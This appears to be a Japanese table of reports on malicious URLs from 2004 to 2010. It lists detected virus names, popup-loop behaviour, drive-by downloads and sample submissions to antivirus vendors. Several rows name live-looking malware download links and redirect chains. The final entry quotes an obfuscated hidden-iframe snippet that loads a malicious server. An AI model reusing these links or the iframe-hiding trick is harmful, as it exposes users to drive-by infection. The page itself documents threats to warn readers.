通し番号. | URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説 |
← このようになっています。 |
[2004/06/13] | 無限JavaScript。ダイアログが無限に現れる一種のブラクラ。Ctrl+Alt+Del で脱出可能。 |
[2004/06/15] | 「 (`Д´)ノ 」というアラートメッセージが無限に表示されるブラクラ。 |
[2004/10/31] | ノートンだとウイルス名:Torjan.Horseを検出。
バスターだと無反応でポプアプ1つと白紙のページが開く。 |
[2005/01/31] | DLまで無害。バスター無反応。このexeからトロイの木馬:Trojan-Dropper.Win32.Mudrop.n を検出。 |
[2005/04/04] | ウィルス名:JAVA_BYTEVER.A |
[2008/11/08] | ウィルス名:PAK_GENERIC.001 |
[2004/10/23] | ウィルス名:BKDR_DTV.A+TROJ_JOINER.I+TROJ_NETGATE.A |
[2006/02/25] | ウィルス名:SPYW_IEEN.A |
[2004/07/15] | 無限JavaScript。 |
[2004/04/14] | ウィルス名:WORM_SKA.A。別名:Happy99.exe
速度の遅いPCだとフリーズする恐れありだが、かなり古いタイプのウイルスなので最近のWindowsUpdateのパッチで対処されている場合が多い。 |
[2004/09/10] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.A-1 |
[2005/09/26] | 海外アダルトサイトだが、スパイウェアがある。このURLに関する悪玉ファイルと思われるのは以下の2つ。
//www.tbcode.com/ist/softwares/v4.0/0006_regular.cab …@ //naturalspy.com/test.gif …A 踏むとしきりにダイアログを表示し、@ をインストールしろ、と言ってくる。拒否し続けるとそのうち、ダイアログは出なくなる。 また、ソースの中に A のgif画像を表示しようとしているが、何故か「width="1" height="1"」という大きさの、はっきり言えば "点" の大きさで呼び出している。 A に行ってみると //www.ulovesex2.com/ に飛び、ウィルス名:TROJ_ANICMOO.E を検出。しかし、このウィルスを検出したのは1回目のみで、その後何回行ってもウィルスは検出されなかった。 |
[2007/04/03] | 「showthemovie.exe」なるファイルが落ちてくる。2007/03/13 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.MFE として検出するよう対応、とのこと。 実際に 2007/03/13 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_DLOADER.MFE を検出することを確認。 2007/03/13 から今日までのファイルの置き換えは無いと推測される。 |
[2005/06/09] | ウィルス名:HTML_MHREDIR.B |
[2008/09/21] | ウィルス名:TROJ_SMALL.GNG |
[2008/11/14] | ウィルス名:TROJ_ISTBAR.EB |
[2007/02/03] | //www.goggle.com/ に飛ぶ。 |
[2008/12/20] | ウィルス名:CRYP_TAP-4 |
[2004/12/17] | //gb.bbs.ws/book.php?book=xtrime に飛ぶ。 |
[2006/08/14] | 2006/08/06 にDL+解凍して現れた「Dialnet0123.exe」「Dialerx0123.ocx」の2つのファイルをトレンドマイクロ社に提出。
今日、その結果の連絡があり、2つのファイルともウィルス名:DIAL_TELEMEDIA.A として検出するよう対応、とのこと。 2006/08/06 にDLした2つのファイルからウィルス名:DIAL_TELEMEDIA.A を検出することを確認。 また、当該URLからDLしたファイルからもウィルス名:DIAL_TELEMEDIA.A を検出することを確認。 |
[2006/11/05] | 「もろ画像-美少女ミルク隊」という日本語のアダルトサイトだが、以下のファイルをインストールしろ、と催促してきてウィルス名:DIAL_TELEMEDIA.A を検出。
//net.iii.tv/a001/DialerX.cab#VERSION=2,0,0,1 |
[2006/11/18] | 2006/11/09 にトレンドマイクロ社にファイルを提出。
2006/11/14 にその結果の連絡があり、ウィルス名:DIAL_RAS.HI として検出するよう対応、とのこと。 実際に2006/11/09 にDLしたファイルからウィルス名:DIAL_RAS.HI を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_RAS.HI を検出することを確認。 |
[2006/11/09] | 2006/11/05 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_RAS.HD として検出するよう対応、とのこと。 実際に 2006/11/05 にDLしたファイルからウィルス名:DIAL_RAS.HD を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_RAS.HD を検出することを確認。 |
[2006/11/09] | 2006/11/05 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_RAS.HE として検出するよう対応、とのこと。 実際に 2006/11/05 にDLしたファイルからウィルス名:DIAL_RAS.HE を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_RAS.HE を検出することを確認。 |
[2006/11/09] | 2006/11/05 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_RAS.HG として検出するよう対応、とのこと。 実際に 2006/11/05 にDLしたファイルからウィルス名:DIAL_RAS.HG を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_RAS.HG を検出することを確認。 |
[2006/11/18] | 2006/11/09 にトレンドマイクロ社に各ファイルを提出。
2006/11/14 にその結果の連絡があり、ウィルス名:DIAL_RAS.HI として検出するよう対応、とのこと。 実際に2006/11/09 にDLしたファイルからウィルス名:DIAL_RAS.HI を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_RAS.HI を検出することを確認。 |
[2008/09/21] | こんな感じ のページだが、ウィルス名:JS_AGENT.AKQT+HTML_DLOADR.KJ を検出。
また、このページからは以下のファイルをDLしろ、と催促されることがあるが、このファイルからウィルス名:TROJ_CRYPT.CX を検出。 //netbandas.com/video98.exe |
[2008/09/21] | ウィルス名:TROJ_EXCHANGE.AF |
[2008/09/21] | ウィルス名:TROJ_CRYPT.CX |
[2007/04/06] | ウィルス名:TROJ_REGISTRAT.B |
[2007/04/06] | 以下のURLから「121.exe」なるファイルが落ちてくるが、ウィルス名:TROJ_REGISTRAT.B を検出。
//netbrowserpro.com/121.exe |
[2008/12/20] | ウィルス名:TROJ_EXCHANGER.Y |
[2009/05/15] | ファイルサイズ:57.0 KB 。ウィルス名:TROJ_DLOADER.WMJ |
[2005/03/19] | ウィルス名:JOKE_GHOST.A 。だが、ジョークファイルで破壊活動は無し。 |
[2008/07/02] | 真っ白なページ。だが、ソースはある。バスター無反応だが、他社ウィルス駆除ソフトで反応するらしい。
他の方の結果は以下。 「踏んでみると Kaspersky がウィルス名:Trojan-Downloader.SWF.Gida.a を検出しました。」 |
[2009/05/15] | ファイルサイズ:77.0 KB 。ウィルス名:TROJ_FAKEAV.FW |
[2005/09/26] | 海外アダルトサイトがブラクラ並に開く。ウィルス名:JS_INOR.AB を検出するサイトもある。 |
[2004/04/19] | 全画面でポップアップが出てエラーメッセージが登場。
普通にポップアップを消すと、また全画面でポップアップが・・・(以下ループ)。 |
[2004/04/20] | デスクトップに「Tramadol」「Time Clock」「Sell Future Payment」の見知らぬファイルが追加される。
お気に入りにも同じものが追加される。 「全てのプログラム」にWorth A Visit が勝手にインストールされる。それを削除しても一分ぐらい放置するとまた復活する。 |
[2008/09/21] | 長いファイル名だが、ウィルス名:MAL_BANKER を検出。 |
[2006/01/14] | スパイウェア配布サイトと思われる。こんな感じ のページで、このページ表示まで無害で、普通に閉じれる。
画面中央の「Eliminate Popup Ads with the Free Quick! Toolbar」を踏むと これ を新窓表示し、少し経ってから「QHVqtb_Setup.exe」なるアプリケーションをDLしろ、と言ってくる。その「QHVqtb_Setup.exe」にはバスター無反応だが、以下のアンチウィルスソフトで反応。 AntiVir → Adware-Spyware/ToolBar.Quick.B adware AVG Antivirus → Generic.DPR ClamAV → Adware.NewDotNet.B-2 Dr.Web → Adware.NewDotNet Fortinet → Adware/Ndotnet Kaspersky Anti-Virus → not-a-virus:AdWare.Win32.Quick.b NOD32 → Win32/Adware.QuickSearchBar application Norman Virus Control → W32/Quick.B UNA → Adware.ToolBar.Quick VBA32 → AdWare.ToolBar.Quick.b また、上記の「Eliminate Popup Ads with the Free Quick! Toolbar」の下に「Click Here Search Directly from Address Bar」というリンクを踏むと、こんな感じ のページを新窓表示し、何かをインストールするよう催促してくる。 その「何か」とは以下のURLファイルである。 //nnbc.newdotnet.net/download/tldctl2.cab?bc=00933#version=7,0,0,14 ↑ バスター無反応だが、以下のアンチウィルスソフトで反応。 Fortinet → Adware/Ndotnet VBA32 → Embedded.AdWare.Win32.NewDotNet.e また、元の //newnet.qsrch.com/ を閉じるとスパイウェア関連のウィンドウがランダムに開く。 |
[2005/10/20] | TELNETストーム。 |
[2005/03/24] | ウィルス名:JS_SPAWN.A 。以前生きていた //raus.de/crashme と同一症状を確認。 |
[2006/05/29] | 他の方の結果は以下の「」内。
「Kaspersky 反応あり。Trojan.JS.WindowBomb.h 検出。小さいニコチャンがいっぱいの窓が動きます。閉じてみるとそのニコチャン窓の小窓版が増殖しながら動いてました。クラッシュミーの亜種のようです。」 |
[2007/01/28] | 「virus JS.WinBomb (Dr.WEB) を検出。」 |
[2009/05/15] | ファイルサイズ:118 KB 。ウィルス名:TROJ_GAMETHI.EGW |
[2009/05/15] | ファイルサイズ:3.33 KB 。バスター無反応だが、他社製ウィルス駆除ソフトによっては反応がある。 |
[2005/06/18] | 踏むと下の @ のURLに飛ぶが、確認すると直打ちだと404になる。
@、//seriousdialer.com/system/exploitz/?acc=1118930441 上のURL解説を参照。 //nicepix.dorki.info/の直接のソース取得は出来なかった。 @ のURLに飛ばすには、//nicepix.dorki.info/ の後ろに何かが付くURL、例えば A 。 A、//nicepix.dorki.info/○○○ という形で一旦アクセスし、A を表示し終えたら○○○を削除してアクセスし直す。 A が『 存在するURL 』でないと @ には行かない。 しかし、//nicepix.dorki.info/○○○も何回か確認すると繋がらない場合もあり。 |
[2005/07/06] | 海外アダルトサイト。相手サーバーが非力なのか回線が細いのか分からないが、表示が遅い。
IFRAMEタグで //dorki.ya-hoo.biz を呼び出しているが正体はトロイの木馬らしいが、この呼び出しURLは時間帯?により存在したり、無くなったりしている模様。詳細は不明。 場合によりウィルスを検出するらしいが、私が(午前0時頃)確認したらバスター無反応。 |
[2005/04/29] | ロリータ画像サムネイルのある海外アダルトサイト。
閉じると海外ロリータ関係のサイトが2つ、サーチ系?サイト1つ開く。 スパイ関係の制限サイトをブロックし、アンチドートでウィルス名:Exploit.VBS.Phel.i を検出。 |
[2005/07/06] | 海外ロリータサイト。相手サーバーが非力なのか回線が細いのか分からないが、表示が遅い。
IFRAMEタグで //dorki.ya-hoo.biz を呼び出しているが正体はトロイの木馬らしいが、この呼び出しURLは時間帯?により存在したり、無くなったりしている模様。詳細は不明。 場合によりウィルスを検出するらしいが、私が(午前0時頃)確認したら上記全てのURLでバスター無反応。 |
[2005/07/14] | ノートンがウィルス名:Downloader.Trojan+MHTMLRedir.Exploit を検出。 |
[2005/06/22] | ウィルス名:JAVA_BYTEVER.A |
[2005/07/06] | 海外ロリータサイト。相手サーバーが非力なのか回線が細いのか分からないが、表示が遅い。
IFRAMEタグで //dorki.ya-hoo.biz を呼び出しているが正体はトロイの木馬らしいが、この呼び出しURLは時間帯?により存在したり、無くなったりしている模様。詳細は不明。 場合によりウィルスを検出するらしいが、私が(午前0時頃)確認したら上記全てのURLでバスター無反応。 |
[2005/07/31] | //nicepix.dorki.info/LS-LAND30/ を再確認。
海外ロリサイトだが、ウィルス名:HTML_MHTREDIR.AP+JAVA_BYTEVER.A を検出。 但し、404の場合もあるらしい。 どこかに貼られたリンクを踏んで繋がると思われるが、それでも404の場合がある。アドレス直打ちでは何度やっても繋がらなかった。 他の方の鑑定結果では、 「海外ロリサイトが開くが、同時に広告POP多数、WEB埋め込み型ウイルスが活動する。」 |
[2005/06/26] | 海外アダルトサイト。タイミングによりウィルスを検出するらしい。
原因はIFRAMEタグで //dorki.ya-hoo.biz を呼び出しているが、どうやら時間帯により、//dorki.ya-hoo.biz のソースが変わるらしいのが原因。 詳細は//dorki.ya-hoo.bizのURL解説も参照。 また、/NIFTY/、/NIFTY2/、/NIFTY3/は閉じると以下の3つのURLが新窓で開く。 //antispamkey.biz/ ← 怪しい箇所は見当たらない。 //tinyurl.com/6q2k7 ← 怪しい箇所は見当たらない。 //nicepix.dorki.info/PIX/ ← IFRAMEタグで //dorki.ya-hoo.biz を呼び出している。 |
[2005/07/06] | 海外ロリータサイト。相手サーバーが非力なのか回線が細いのか分からないが、表示が遅い。
IFRAMEタグで//dorki.ya-hoo.bizを呼び出しているが正体はトロイの木馬らしいが、この呼び出しURLは時間帯?により存在したり、無くなったりしている模様。詳細は不明。 場合によりウィルスを検出するらしいが、私が(午前0時頃)確認したらバスター無反応。 |
[2005/05/11] | 海外アダルトサイト。踏んだ結果は以下。
ウィルスバスターでは無反応。 アンチドートではウィルス名:Exploit.VBS.Phel.i を検出。 ノートンではウィルス名:Blood Hound Exploit 10 を検出。 Microsoft AntiSpywareでは無反応。SPYBOTでも無反応。 このサイトはIFRAMEタグを使い、縦0ドット、横0ドットの大きさで //dorki.ya-hoo.biz を呼び出す。 //dorki.ya-hoo.biz は「hta.php」なるものをIFRAMEタグで呼び出しているが、詳細不明。 アンチウィルスソフトが反応したのは、この「hta.php」なるものに反応したと思われる。 2回目以降の確認では真っ白なページを表示、ソースも変わってしまい、確認不可。 また、元の //nicepix.dorki.info/SMP/ を閉じると以下の3つのURLが新窓で開く。 //antyspam.biz/ ← 別窓1枚付きの海外サイト。閉じると更に別サイトを新窓表示。 //tinyurl.com/6q2k7 ← 「ページを表示できません」となる。 //littlegirls.dark-v.com ← 「ページを表示できません」となる。 |
[2005/05/25] | アンチドートではウィルス名:Exploit.VBS.Phel.i を検出。
閉じると更に他のアダルトサイトなどを開いてくる。 |
[2005/07/06] | 海外ロリータサイト。相手サーバーが非力なのか回線が細いのか分からないが、表示が遅い。
IFRAMEタグで //dorki.ya-hoo.biz を呼び出しているが正体はトロイの木馬らしいが、この呼び出しURLは時間帯?により存在したり、無くなったりしている模様。詳細は不明。 場合によりウィルスを検出するらしいが、私が(午前0時頃)確認したらバスター無反応。 |
[2005/06/29] | 以下のURLに飛び、ウィルス名:HTML_MHTREDIR.AP+JAVA_BYTEVER.A を検出。
//highconvert.com/system/users/dimpy/ |
[2005/04/04] | //schoolteensex.com/ に飛び、ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 を検出。
ただし、何回か確認すると未検出の場合もあり、その割合は半々くらい。 |
[2005/06/29] | 以下のURLに飛び、ウィルス名:HTML_MHTREDIR.AP+JAVA_BYTEVER.A を検出。
//highconvert.com/system/users/dimpy/ |
[2005/04/04] | //schoolteensex.com/ に飛び、ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 を検出。
ただし、何回か確認すると未検出の場合もあり、その割合は半々くらい。 |
[2005/10/09] | ウィルス名:HTML_MHTREDIR.AP+VBS_PSYME.AN+JAVA_BYTEVER.A+JAVA_BYTEVER.D+JAVA_BYTEVER.E |
[2005/10/09] | ウィルス名:HTML_MHTREDIR.AP+VBS_PSYME.AN+JAVA_BYTEVER.A+JAVA_BYTEVER.D+JAVA_BYTEVER.E |
[2005/12/29] | 海外アダルトサイト。
ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.D+JAVA_BYTEVER.E+JAVA_BYTEVER.S |
[2005/10/02] | ウィルス名:HTML_MHTREDIR.AP+VBS_PSYME.AN+JAVA_BYTEVER.A+JAVA_BYTEVER.D+JAVA_BYTEVER.E
但し、私が確認してウィルスを検出したのは今日のAM6:00頃で、今(PM9:40頃)確認すると、バスター無反応、ウィルス未検出であった。 |
[2005/10/03] | 今日のAM5:50頃 再確認。上記のウィルス発動有り。 |
[2005/12/29] | 海外アダルトサイト。
ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.D+JAVA_BYTEVER.E+JAVA_BYTEVER.S |
[2005/12/29] | 海外アダルトサイト。
ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.D+JAVA_BYTEVER.E+JAVA_BYTEVER.S |
[2005/10/09] | ウィルス名:HTML_MHTREDIR.AP+VBS_PSYME.AN+JAVA_BYTEVER.A+JAVA_BYTEVER.D+JAVA_BYTEVER.E |
[2010/01/19] | 以下のURLに飛ぶようになっている。実際に踏んで確認。
//ha.ckers.org/weird/popup.html |
[2009/05/18] | こんな感じ のサイト。バスター無反応。
しかし、GENOウイルス感染サイトらしい。Vista環境では一応は無害らしいが、XP環境では要注意。 |
[2008/09/21] | 2重拡張子。ウィルス名:TROJ_AGENT.AFSC |
[2005/12/21] | メディアプレーヤーのアイコンをしたexe。バスター無反応だが、以下のアンチウィルスソフトで反応。
ANTIDOTE → Trojan-PSW.Win32.Kapod.n AntiVir → Trojan/PSW.Kapod.k.14 ArcaVir → Trojan.Psw.Kapod.N AVG → PSW.Generic.NFW Dr.Web → Trojan.PWS.MailSnd Fortinet → W32/Kapod.N!pws Kaspersky → Trojan-PSW.Win32.Kapod.n NOD32 → a variant of Win32/Tsipe VBA32 → Trojan-PSW.Win32.Kapod.n |
[2006/01/22] | exeを実行すると、ワンクリック詐欺サイトの請求書を表示。 |
[2009/05/15] | ファイルサイズ:61.5 KB 。ウィルス名:TROJ_ZBOT.BGZ |
[2009/05/15] | ファイルサイズ:190 KB 。ウィルス名:TROJ_DLOADER.WIA |
[2009/05/15] | ファイルサイズ:162 KB 。バスター無反応だが、他社製ウィルス駆除ソフトによっては反応がある。 |
[2006/01/14] | バスター無反応だが、以下のアンチウィルスソフトで反応。
Fortinet → Adware/Ndotnet VBA32 → Embedded.AdWare.Win32.NewDotNet.e |
[2007/04/15] | 真っ白なページ。バスター無反応だが、他社製アンチウィルスソフトでは反応があると思われる。 |
[2006/07/28] | DL+解凍すると「nobolauto.exe」ファイルが現れる。
2006/07/24 にトレンドマイクロ社に提出。今日、その結果の連絡があり、その結果は以下。 「ウイルスパターンファイル 3.595.00 にてウィルス名:TROJ_DELF.CIF として対応しました。」 実際にファイルをDLしてウィルス名:TROJ_DELF.CIF を検出することを確認。 |
[2009/05/15] | ファイルサイズ:145 KB 。ウィルス名:TROJ_AGENT.AHEF |
[2009/01/21] | //fast-skan-av-pc.com/1/?id=21151 に飛び、インチキセキュリティサイトを表示する。 |
[2009/01/21] | 他の方の結果は以下の「」内。
「クリックするといきなりWindows Antivirusというインチキなセキュリティソフトをダウンロードされそうになりました。」 |
[2007/05/18] | 2007/05/13 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TSPY_BANCOS.DHT として検出するよう対応、とのこと。 実際に 2007/05/13 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TSPY_BANCOS.DHT を検出することを確認。 2007/05/13 から今日までのファイルの置き換えは無いと推測される。 |
[2009/05/15] | ファイルサイズ:60.5 KB 。ウィルス名:TSPY_ZBOT.BEA |
[2007/02/20] | 2007/02/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.ITO として検出するよう対応、とのこと。 実際に 2007/02/12 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_DLOADER.ITO を検出することを確認。 2007/02/12 から今日までのファイルの置き換えは無いと推測される。 |
[2007/02/12] | ウィルス名:TROJ_BANLOAD.JCY |
[2007/02/12] | ウィルス名:TROJ_DLOADER.GEN |
[2007/02/12] | ウィルス名:TROJ_BANLOAD.JCY |
[2007/02/12] | ウィルス名:TROJ_BANLOAD.BQM |
[2007/02/12] | ウィルス名:TROJ_BANLOAD.JCY |
[2009/11/08] | 今日、確認すると 404Error になっていたが、以前は Kaspersky で HEUR:Trojan.Script.Iframer を検出したらしい。 |
[2008/12/20] | ウィルス名:TROJ_NUWAR.CGZ |
[2008/08/26] | ウィルス名:TSC_GENCLEAN+TROJ_EXCHANGE.AF |
[2005/04/29] | ウィルス名:JS_PSYME.AF。//www.googkle.com/ と同じ現象が起きる。詳細は //www.gookle.com/ のURL解説を参照。 |
[2008/10/28] | ウィルス名:HACKINGTOOLS_CLEARLOG |
[2009/05/15] | ファイルサイズ:18.1 KB 。解凍すると「fakegina.dll」ファイルが現れるが、ウィルス名:TROJ_FAKEGINA.A を検出。 |
[2009/05/16] | ファイルサイズ:32.0 KB 。ウィルス名:TROJ_KLOGGER.A |
[2009/05/15] | ファイルサイズ:132 KB 。ウィルス名:HKTL_SQLPASS.A
このファイルは スパイウェアである。 |
[2009/05/15] | ファイルサイズ:44.0 KB 。ウィルス名:TROJ_GENERIC |
[2006/01/20] | //www.nude-live-cams.com/cgi-bin/tm3/m に飛んで、海外アダルトサイトを表示するが、以下のウィルスを検出。「xpl.wmf」ファイルも落ちてくる。
ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y+TROJ_ANICMOO.X+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC ソースを見るとコード変換された部分がある。そこに以下のURLが隠れている。 //game4all.biz/adv/120/new.php 閉じると 「ALFASEARCH」という検索サイトと、ブラクラ並に色々な海外アダルトサイトを開く。 |
[2006/09/03] | 直踏みでは動画はエラーが出て再生されなかったが、他の方の結果ではノートンが Packed.Adware を検出するらしい。 |
[2006/01/09] | 踏むと こんな感じ のサイトだが、何かを読み込んでいて、その間はHDDが唸り、そのうち唸りは止まる。
ソースを見ると分解されたスクリプトがある。(下記参照) <i' + 'fr'+'ame style="display:none" src="http://85.255.1'+'13.22/inc/na'+'n8.html"></i' + 'frame> ↑ つまり、以下の @ をIFRAMEタグで呼び出している。それが唸りの原因。私が確認した時は少し唸ってそれで終わったが、踏む時間帯 or タイミングにより、WMF脆弱性関連ウィルスが検出される場合があるらしいので、注意。 ちなみに、以下の @ は、A を呼び出し、A は B に Locationヘッダ で飛んでいる。B はソースのほとんどがコード変換されていて、IE直踏みすると、HDDが唸り、何かを呼び出している挙動をする。 @、//85.255.113.22/inc/nan8.html A、//85.255.113.10/?to=nan8&from=in B、//85.255.113.83/users/fill/web/count.php?id=nan8 |